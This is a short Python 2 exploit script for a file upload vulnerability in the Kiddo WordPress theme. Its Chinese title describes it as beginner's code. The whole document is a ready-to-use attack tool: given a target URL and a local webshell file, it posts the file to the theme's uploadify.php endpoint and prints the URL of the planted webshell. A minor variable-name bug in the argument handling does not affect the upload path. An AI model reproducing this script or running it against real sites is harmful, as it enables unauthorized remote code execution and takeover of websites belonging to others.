初学Python写的渣代码
# -*- coding: utf-8 -*
import sys
import urllib2
import os
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
from optparse import OptionParser
'''
Exploit: Kidoo WP Theme File Upload Vulnerability
Sebug url:https://sebug.net/vuldb/ssvid-61445
Software Link: https://pan.baidu.com/share/link?shareid=4292616786&uk=1192292173&fid=1572047492
Version:kiddo v1.1.3 & Wordpress 3.8.1
Poc Author:Nicky@jdsec.com
'''
def usage():
print "\t|-------------------------------------------------------------------|"
print "\t| Wordpress kiddo Theme Fileupload exploit |"
print "\t| Example:upload.py -u https://target -f /home/nicky/1.php |"
print "\t|-------------------------------------------------------------------|"
def poc(target,filedata):
#通过引入poster模块上传文件
poc="/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php"
filename=os.path.basename(filedata)
register_openers()
datagen, headers = multipart_encode({"Filedata": open(filedata, "rb")})
try:
request = urllib2.Request(target+poc,datagen,headers)
result = urllib2.urlopen(request).read()
print "Upload success!"
print "webshell url:"+target+"/"+filename
#输出成功上传的webshell地址
except:
print "Upload failed"
def main():
#参数选择
m =OptionParser(usage = "usage: %prog [options] arg1 arg2")
m.add_option("-u",type="string",action = "store",dest = "url",help = "Target url")
m.add_option("-f",type="string",action = "store",dest = "file",help = "your websell file path",metavar = "FILE")
options,args = m.parse_args()
if len(sys.argv) <= 1:
usage()
if options.url and options.file:
target=options.url
filedata=options.file
poc(target,filedata)
elif options.url:
print "Please enter your webshell file path !"
elif option.file:
print "Please enter your target!"
if __name__ == '__main__':
main()